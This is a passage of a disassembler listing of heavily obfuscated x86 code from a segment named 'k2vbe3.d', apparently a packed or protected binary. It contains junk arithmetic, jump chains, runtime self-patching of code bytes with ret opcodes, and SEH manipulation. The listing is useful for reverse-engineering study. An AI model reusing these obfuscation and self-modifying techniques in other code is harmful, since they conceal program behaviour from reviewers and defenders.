loc_45AFB9:				; CODE XREF: sub_455C7A-EDB0j
					; sub_451222+2j
		push	edx
		jmp	loc_4571AD
; END OF FUNCTION CHUNK	FOR sub_451222
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_398. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45AFC0	proc near		; CODE XREF: sub_4512B9-ADE1p

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+4+var_4]
		push	offset sub_4597E6
		jmp	nullsub_405
sub_45AFC0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_45AFD3	proc near		; CODE XREF: sub_454F1F+Dj
		retn
sub_45AFD3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_45AFD4:				; CODE XREF: sub_440D7B+11AA7j
		jmp	loc_45648B
; END OF FUNCTION CHUNK	FOR sub_440D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_45AFD9:				; CODE XREF: sub_44FF97:loc_459D94j
		pop	edi
		mov	eax, [esp+0]
		push	edx
		push	ebx
		push	0C6527178h
		jmp	loc_456BBF
; END OF FUNCTION CHUNK	FOR sub_44FF97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_45AFE9:				; CODE XREF: sub_44DB59-F272j
		and	ebx, esi
		jp	loc_44F9D2
		cmp	esi, 42ECE102h
		jmp	loc_45001A
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
		and	esi, edi
		jmp	sub_44FFD3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_45B003:				; CODE XREF: sub_446E24+14B6Dj
		jbe	loc_43E7C1
		jmp	loc_443B4B
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------

loc_45B00E:				; CODE XREF: k2vbe3.d:loc_446BBAj
		jmp	ds:off_41E174
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_45B014:				; CODE XREF: k2vbe3.d:loc_448033j
					; sub_451CF1-3312j ...
		jb	loc_457A09
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_44367E
		jmp	loc_453D08
; END OF FUNCTION CHUNK	FOR sub_451CF1

; =============== S U B	R O U T	I N E =======================================



sub_45B029	proc near		; CODE XREF: sub_44680D+871Fj
					; sub_4529D2+6p

; FUNCTION CHUNK AT 004429E3 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044AF07 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		js	sub_4429FF
		add	esp, 0FFFFFED8h
		mov	[ebp-8], edx
		jmp	loc_44AF07
sub_45B029	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45B041	proc near		; DATA XREF: k2vbe3.d:0044A963o
		call	nullsub_1
		call	sub_4436CE
		mov	edx, 0CF0182F6h
		call	sub_4432B0
		mov	ds:dword_444F20, eax
		jmp	loc_44E846
sub_45B041	endp

; ---------------------------------------------------------------------------

loc_45B05F:				; CODE XREF: k2vbe3.d:loc_458B7Aj
		push	ebp
		mov	ebp, esp
		jmp	loc_43E9D5
; ---------------------------------------------------------------------------

loc_45B067:				; CODE XREF: k2vbe3.d:0043E2AFj
		cmp	edx, 261F21BCh
		jmp	loc_459557
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_45B072:				; CODE XREF: sub_446258+4A5Ej
		jnb	loc_444A73
		add	edi, 0C4C0C536h
		test	edx, ebx
		jmp	loc_43D56B
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0BA

loc_45B085:				; CODE XREF: sub_43D0BA:loc_450DD7j
		xor	edx, 105283F2h
		add	edx, ebp
		add	edx, 9C7BE1A2h
		mov	edx, [edx]
		imul	byte ptr [edx]
		push	offset loc_43D12A
		jmp	nullsub_461
; END OF FUNCTION CHUNK	FOR sub_43D0BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442D04

loc_45B0A1:				; CODE XREF: sub_442D04-2EA1j
		add	edi, 7726F5FBh
		rol	edi, 19h
		sub	edi, ds:4000EDh
		rol	edi, 0Eh
		test	edi, 4000h
		jmp	loc_450E21
; END OF FUNCTION CHUNK	FOR sub_442D04
; ---------------------------------------------------------------------------
		push	esi
		jmp	sub_457A42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_45B0C4:				; CODE XREF: sub_44B94B:loc_44D2ECj
		adc	ecx, 967B6BD4h
		test	ebp, 56D57B9Fh
		jmp	loc_447F02
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455A4F

loc_45B0D5:				; CODE XREF: sub_455A4F:loc_459E4Fj
		pop	esi
		sub	esi, 68ED12D1h
		add	esi, 0F888228Fh
		xor	esi, 7F4D42EBh
		add	esi, 7510477Ch
		xor	eax, esi
		call	sub_44B477
; END OF FUNCTION CHUNK	FOR sub_455A4F
; START	OF FUNCTION CHUNK FOR sub_44D092

loc_45B0F5:				; CODE XREF: sub_44D092+Dj
		jmp	loc_459445
; END OF FUNCTION CHUNK	FOR sub_44D092
; ---------------------------------------------------------------------------

loc_45B0FA:				; CODE XREF: k2vbe3.d:0044A9B3j
		jmp	locret_43E232
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448472

loc_45B0FF:				; CODE XREF: sub_448472:loc_44774Dj
		sub	eax, 5164D980h
		jmp	loc_459D53
; END OF FUNCTION CHUNK	FOR sub_448472
; ---------------------------------------------------------------------------

locret_45B10A:				; CODE XREF: k2vbe3.d:0045B65Ej
		retn
; ---------------------------------------------------------------------------

loc_45B10B:				; CODE XREF: k2vbe3.d:0044F4C2j
		jmp	sub_444615
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A60

loc_45B110:				; CODE XREF: sub_459A60-CF0j
		jz	loc_457793
		jmp	loc_45A01A
; END OF FUNCTION CHUNK	FOR sub_459A60
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_272. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_267. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527C2

loc_45B11D:				; CODE XREF: sub_4527C2+4j
		jmp	loc_43DF50
; END OF FUNCTION CHUNK	FOR sub_4527C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_45B122:				; CODE XREF: sub_44DAF6-AAEBj
		jmp	loc_45843D
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_343. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_45B128:				; CODE XREF: sub_444D7B+DBFDj
		jmp	loc_441C3A
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------

loc_45B12D:				; CODE XREF: k2vbe3.d:00447A66j
		mov	ds:dword_41E104, eax
		lea	eax, nullsub_482
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_482
; ---------------------------------------------------------------------------
		xchg	esi, [esp]
		jmp	loc_442063
; ---------------------------------------------------------------------------
		mov	ebp, [ebx]
		jmp	sub_43EBB1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_45B150:				; CODE XREF: sub_45762D:loc_440B8Bj
					; k2vbe3.d:00440BA4j
		add	ecx, 87A54B3Eh
		xor	eax, ecx
		pop	ecx
		ror	eax, 19h
		push	ebx
		jmp	loc_4417D0
; END OF FUNCTION CHUNK	FOR sub_45762D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455BEA

loc_45B162:				; CODE XREF: sub_455BEA-1439Fj
		jz	loc_4520B0
		jmp	loc_44FF43
; END OF FUNCTION CHUNK	FOR sub_455BEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458A60

loc_45B16D:				; CODE XREF: sub_458A60+Cj
		jz	sub_43FE19
		jmp	loc_4511BC
; END OF FUNCTION CHUNK	FOR sub_458A60
; ---------------------------------------------------------------------------
		push	esi
		mov	esi, eax
		call	sub_4455D8

; =============== S U B	R O U T	I N E =======================================



sub_45B180	proc near		; CODE XREF: k2vbe3.d:00448B07j
					; sub_4597AE-2459p
		xchg	eax, [esp+0]
		pop	eax
		push	edx
		push	0C2D93296h
		pop	edx

loc_45B18B:				; CODE XREF: k2vbe3.d:loc_446AF7j
		xor	edx, 0E52E4F6Eh
		cmp	edx, 0C8745E8Eh
		jmp	loc_440408
sub_45B180	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_345. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_45B19D:				; CODE XREF: sub_4440E5+10D0Bj
		jmp	loc_43EBDD
; END OF FUNCTION CHUNK	FOR sub_4440E5
; ---------------------------------------------------------------------------

loc_45B1A2:				; CODE XREF: k2vbe3.d:00450D5Dj
		jmp	locret_4473C5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_45B1A7:				; CODE XREF: sub_451EB7+1456j
		jo	loc_43DBC9
		or	eax, 1A8177BCh
		push	54E2E2BDh

loc_45B1B8:				; CODE XREF: k2vbe3.d:loc_456D56j
		mov	eax, [ebp-0Ch]
		push	ecx
		push	0B7E6FC37h
		pop	ecx
		jmp	loc_44EED0
; END OF FUNCTION CHUNK	FOR sub_451EB7
; ---------------------------------------------------------------------------
		mov	edx, 43A8AC5Ch
		push	ecx
		push	0D5612E92h
		pop	ecx
		and	ecx, 0F3A7C5D2h
		jmp	loc_43F720
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4517D6

loc_45B1DE:				; CODE XREF: sub_4517D6+22j
		jnz	loc_4430BE

loc_45B1E4:				; CODE XREF: sub_45A5D9+14j
		jmp	loc_43C7DA
; END OF FUNCTION CHUNK	FOR sub_4517D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FDAC

loc_45B1E9:				; CODE XREF: sub_44FDAC+8072j
		jmp	nullsub_413
; END OF FUNCTION CHUNK	FOR sub_44FDAC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F6E

loc_45B1EE:				; CODE XREF: sub_445F6E+7DB3j
		jmp	loc_43E2D9
; END OF FUNCTION CHUNK	FOR sub_445F6E
; ---------------------------------------------------------------------------
		pop	esi
		jmp	loc_4430B9
; ---------------------------------------------------------------------------

loc_45B1F9:				; CODE XREF: k2vbe3.d:loc_458936j
		jnz	loc_444907
		jmp	loc_4413D9
; ---------------------------------------------------------------------------
		popf
		jmp	sub_44F4D2

; =============== S U B	R O U T	I N E =======================================



sub_45B20A	proc near		; CODE XREF: sub_43CCD0:loc_43CECDp
					; sub_44D2F1-1032Ep ...

; FUNCTION CHUNK AT 0043EA23 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F931 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441B7A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004427F1 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00442CE1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444D99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004467B6 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00448BAC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448C5E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449248 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044974D SIZE 00000027 BYTES
; FUNCTION CHUNK AT 004497E8 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C834 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044CB22 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044DEB8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E2CC SIZE 0000002C BYTES
; FUNCTION CHUNK AT 00452215 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453784 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00453F26 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004598A9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AC42 SIZE 0000000B BYTES

		push	ebp
		call	sub_4529D2

loc_45B210:				; CODE XREF: sub_43C68E+154F1j
		jmp	loc_45AC42
sub_45B20A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443795

loc_45B215:				; CODE XREF: sub_443795+16j
		jmp	loc_4412FF
; END OF FUNCTION CHUNK	FOR sub_443795
; ---------------------------------------------------------------------------

locret_45B21A:				; CODE XREF: k2vbe3.d:loc_452A72j
		retn
; ---------------------------------------------------------------------------

loc_45B21B:				; CODE XREF: k2vbe3.d:0045B8C8j
		jmp	nullsub_467
; ---------------------------------------------------------------------------

loc_45B220:				; DATA XREF: sub_4478F3+5o
		push	4B1C86h
		mov	eax, [ebp-10h]
		push	ebp
		mov	ebp, eax

loc_45B22B:				; CODE XREF: k2vbe3.d:loc_43DE99j
		push	offset loc_44AEA6
		jmp	locret_4506E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_45B235:				; CODE XREF: sub_44B94B-9BCFj
		sbb	ebx, 6192E4C6h

loc_45B23B:				; CODE XREF: sub_44B94B:loc_4492DCj
		push	4645EF8Eh
		pop	eax
		or	eax, 96D6D654h
		js	loc_4587E6

loc_45B24D:				; CODE XREF: sub_43E282+3921j
		jmp	loc_45BC35
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
		xor	edi, ecx
		jmp	loc_43DD68
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_45B259:				; CODE XREF: sub_44B979:loc_44C139j
		js	loc_4462FA
		call	sub_44863D

loc_45B264:				; CODE XREF: sub_4582DD-1A750j
		jno	sub_444A06

loc_45B26A:				; CODE XREF: sub_4582DD:loc_43EDD2j
		push	16F5C179h
		pop	eax
		sub	eax, 0C9B1CB32h
		jmp	loc_43DFAF
; END OF FUNCTION CHUNK	FOR sub_44B979

; =============== S U B	R O U T	I N E =======================================



sub_45B27B	proc near		; DATA XREF: sub_45512F:loc_44DFDBo

; FUNCTION CHUNK AT 0044B46B SIZE 00000005 BYTES

		mov	eax, [ebp-8]
		push	offset sub_448512
		jmp	loc_44B46B
sub_45B27B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF35

loc_45B288:				; CODE XREF: sub_43CF35+1C74Ej
		adc	esi, edx
		jmp	loc_454436
; END OF FUNCTION CHUNK	FOR sub_43CF35
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_149. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_45B290:				; CODE XREF: sub_44921C:loc_45279Cj
					; sub_45985E+Aj
		jmp	loc_45880B
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_45B295:				; CODE XREF: sub_4426DF+382Dj
		jmp	loc_454DA2
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------

loc_45B29A:				; CODE XREF: k2vbe3.d:004452C1j
		jmp	loc_4406EB
; ---------------------------------------------------------------------------
		mov	[ebp+0], ecx
		jmp	sub_440C7D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_20. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	ebp, esp
		jb	loc_43FC80
		add	esp, 0FFFFFFCCh
		lea	eax, nullsub_20
		mov	byte ptr [eax],	0C3h
		push	edi
		mov	edi, ebx
		jmp	loc_442BEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F1C4

loc_45B2C4:				; CODE XREF: sub_44F1C4:loc_43EC13j
		call	sub_44EABB

loc_45B2C9:				; CODE XREF: sub_442556+1Cj
		jmp	loc_43DDE5
; END OF FUNCTION CHUNK	FOR sub_44F1C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_45B2CE:				; CODE XREF: sub_446E24+14AD4j
		ror	edx, 0Eh
		popf
		test	edi, 0FDAB9FCCh
		jmp	loc_448DE9
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_45B2DD:				; CODE XREF: sub_444D7B:loc_44C0E5j
		call	sub_43FF90
; END OF FUNCTION CHUNK	FOR sub_444D7B
; START	OF FUNCTION CHUNK FOR sub_45A21D

loc_45B2E2:				; CODE XREF: k2vbe3.d:0043C87Aj
					; sub_45A21D:loc_44493Fj
		jmp	loc_44E044
; END OF FUNCTION CHUNK	FOR sub_45A21D
; ---------------------------------------------------------------------------
		pop	large dword ptr	fs:0
		add	esp, 4

loc_45B2F1:				; CODE XREF: k2vbe3.d:0045BBF9j
		xchg	eax, [esp]
		mov	ecx, eax
		jmp	loc_43F2DC
; ---------------------------------------------------------------------------

locret_45B2FB:				; CODE XREF: k2vbe3.d:00444A31j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_45B2FC:				; CODE XREF: sub_43D7A9+1DD86j
		jmp	loc_453C43
; END OF FUNCTION CHUNK	FOR sub_43D7A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45451C

loc_45B301:				; CODE XREF: sub_45451C-4295j
		add	esi, 2D7EE197h
		xchg	esi, [esp-4+arg_0]
		jmp	sub_453347
; END OF FUNCTION CHUNK	FOR sub_45451C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_45B30F:				; CODE XREF: sub_45A323-1DA69j
		jz	loc_43DC0D
		jmp	loc_4506B4
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF7B

loc_45B31A:				; CODE XREF: sub_43FF7B:loc_459C59j
		pop	ecx
		xor	eax, ds:4000E9h
		add	eax, 34DCE2A3h
		xchg	eax, [esp+4+var_4]
		jmp	sub_444B3E
; END OF FUNCTION CHUNK	FOR sub_43FF7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444966

loc_45B32F:				; CODE XREF: sub_444966+524Bj
		jbe	loc_45131D

loc_45B335:				; CODE XREF: sub_444966:loc_4560E4j
		or	eax, 0E6B62C08h
		jnz	loc_4566B2

loc_45B341:				; CODE XREF: sub_45B76B+19j
		jmp	sub_454516
; END OF FUNCTION CHUNK	FOR sub_444966
; ---------------------------------------------------------------------------

loc_45B346:				; CODE XREF: k2vbe3.d:0045AE22j
		jmp	loc_447DE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_45B34B:				; CODE XREF: sub_444D7B+15C6Fj
		jmp	loc_458199
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------
		add	ebx, esi
		jmp	loc_43C753
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_104. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_45B358:				; CODE XREF: sub_43F7AC+192D8j
		jmp	loc_452AC8
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CC1

loc_45B35D:				; CODE XREF: sub_448CC1+12j
		jmp	sub_44B359
; END OF FUNCTION CHUNK	FOR sub_448CC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4568F5

loc_45B362:				; CODE XREF: sub_4568F5+9j
		call	sub_4479A1
		mov	eax, 0D6CB94Ch
		call	sub_43C82E

loc_45B371:				; CODE XREF: k2vbe3.d:00441CB8j
		push	offset sub_43D612
		jmp	nullsub_419
; END OF FUNCTION CHUNK	FOR sub_4568F5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_184. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_45B37C:				; CODE XREF: sub_43FF90+3F37j
		jmp	nullsub_451
; END OF FUNCTION CHUNK	FOR sub_43FF90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_45B381:				; CODE XREF: sub_44B870-B5EAj
		jmp	loc_44B017
; END OF FUNCTION CHUNK	FOR sub_44B870
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_507. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	edi, 6568C270h
		jmp	loc_448410
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_44CCD8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44945C

loc_45B398:				; CODE XREF: sub_44945C:loc_44880Dj
		xchg	ecx, [esi]
		jmp	loc_4516B6
; END OF FUNCTION CHUNK	FOR sub_44945C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BAE4

loc_45B39F:				; CODE XREF: sub_44BAE4:loc_4450B5j
					; k2vbe3.d:004450CBj
		xor	eax, 0ADD4B594h
		sub	eax, 48F9F08Ah
		or	eax, 0BD122640h
		add	eax, 325F44Ch
		xchg	eax, [esp+0]
		jmp	loc_4536B6
; END OF FUNCTION CHUNK	FOR sub_44BAE4
; ---------------------------------------------------------------------------
		mov	eax, 0A5559D12h
		jmp	loc_43C130
; ---------------------------------------------------------------------------

loc_45B3C9:				; DATA XREF: k2vbe3.d:0043CC5Ao
		call	sub_4553CC
		push	edx
		push	0BC13AEF6h
		and	edx, 0E2BE2B8Ch
		jmp	loc_44550E
; ---------------------------------------------------------------------------

loc_45B3DF:				; DATA XREF: sub_4424CF+F4BEo
		test	byte ptr [eax+1], 80h
		jnz	loc_44CE49
		jmp	loc_43DE88
; ---------------------------------------------------------------------------

loc_45B3EE:				; DATA XREF: sub_44DAA0+Ao
		mov	[ebp-4], eax
		mov	eax, [ebp-14h]
		mov	[ebp-0Ch], eax
		mov	eax, [ebp-20h]
		movzx	eax, byte ptr [eax]
		jmp	loc_44A6F3
; ---------------------------------------------------------------------------

loc_45B402:				; DATA XREF: k2vbe3.d:loc_448007o
		add	eax, 93968B22h
		call	sub_4553CC
		call	sub_450453
; START	OF FUNCTION CHUNK FOR sub_446CE6

loc_45B412:				; CODE XREF: sub_446CE6+ECD2j
		jmp	loc_44EB34
; END OF FUNCTION CHUNK	FOR sub_446CE6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_45B417:				; CODE XREF: sub_45A323-7145j
		jmp	loc_44FFA7
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_45B41C:				; CODE XREF: sub_44D59D+Cj
		jmp	loc_446C00
; END OF FUNCTION CHUNK	FOR sub_44D59D
; ---------------------------------------------------------------------------

loc_45B421:				; CODE XREF: k2vbe3.d:004463DEj
		jmp	loc_440A20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_45B426:				; CODE XREF: sub_44F028-9F9Aj
		jmp	loc_454DF5
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF62

loc_45B42B:				; CODE XREF: sub_43CF62+28C7j
		jmp	loc_458E4B
; END OF FUNCTION CHUNK	FOR sub_43CF62
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_45B430:				; CODE XREF: sub_454E69-108B9j
		add	eax, 239C6C16h
		shl	ecx, 2
		push	0FAD706B0h
		cmp	eax, 0A19595B9h
		jmp	loc_44519F
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------

loc_45B449:				; CODE XREF: k2vbe3.d:0044AC30j
		test	ecx, 4000000h
		jmp	loc_454A44

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45B454	proc near		; CODE XREF: sub_44128B+6j

; FUNCTION CHUNK AT 0044B106 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A8E5 SIZE 0000000B BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cmp	ds:dword_44BD18, 0
		jmp	loc_44B106
sub_45B454	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_443. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_45B467:				; CODE XREF: sub_4440E5+753Dj
		jmp	loc_456F52
; END OF FUNCTION CHUNK	FOR sub_4440E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453347

loc_45B46C:				; CODE XREF: sub_453347-101FFj
		jmp	loc_44D61D
; END OF FUNCTION CHUNK	FOR sub_453347
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D942

loc_45B471:				; CODE XREF: sub_43D942+7j
		jmp	loc_43D7EE
; END OF FUNCTION CHUNK	FOR sub_43D942
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4EE

loc_45B476:				; CODE XREF: sub_45B4EE+9j
		sub	edi, 386BD5FCh
		jb	loc_45766B

loc_45B482:				; CODE XREF: sub_443E64+Aj
		jmp	loc_449A8E
; END OF FUNCTION CHUNK	FOR sub_45B4EE
; ---------------------------------------------------------------------------

loc_45B487:				; CODE XREF: k2vbe3.d:00442E75j
		jmp	loc_44FDD3
; ---------------------------------------------------------------------------
		and	ebx, 0DEFEF79Ah
		jmp	loc_457661
; ---------------------------------------------------------------------------

loc_45B497:				; CODE XREF: k2vbe3.d:00455E8Dj
		jle	loc_455837
		push	0FBF8C56Fh

; =============== S U B	R O U T	I N E =======================================



sub_45B4A2	proc near		; CODE XREF: k2vbe3.d:004473B1p

; FUNCTION CHUNK AT 0043C55D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043ED12 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441C8B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044359E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446CBA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A2D7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044C2DA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044E684 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C253 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		jo	loc_44359E
		mov	edx, ds:dword_44BA84
		or	edx, edx
		jmp	loc_45C253
sub_45B4A2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45B4B9	proc near		; DATA XREF: k2vbe3.d:0044FA50o

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]
		push	edi
		push	offset loc_45673B
		jmp	nullsub_534
sub_45B4B9	endp

; ---------------------------------------------------------------------------
		mov	ds:off_41E198, eax
		lea	eax, sub_448380
		mov	byte ptr [eax],	0C3h
		jmp	loc_450EF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448380

loc_45B4DE:				; CODE XREF: sub_448380+6j
		mov	eax, [esp-4+arg_0]
		push	edx
		push	ebx
		push	0D27A5F98h
		pop	ebx
		jmp	loc_44EB7A
; END OF FUNCTION CHUNK	FOR sub_448380

; =============== S U B	R O U T	I N E =======================================



sub_45B4EE	proc near		; DATA XREF: sub_44E39D-630Ao

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043CEEB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043D73F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043DA47 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043F6FD SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00442D0A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004451D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449A8E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044D9D7 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045766B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458AE1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B476 SIZE 00000011 BYTES

		xchg	esi, [esp+0]
		mov	edi, esi
		pop	esi
		rol	edi, 19h
		jmp	loc_45B476
sub_45B4EE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_45B4FC:				; CODE XREF: sub_454E83+6j
		xchg	eax, [esp+10h+var_10]
		push	esi
		push	0C44706Ch
		pop	esi
		or	esi, 0D9D53F6Bh
		add	esi, ds:4000E8h
		and	esi, 404996CAh
		jmp	loc_44FE2F
; END OF FUNCTION CHUNK	FOR sub_454E83
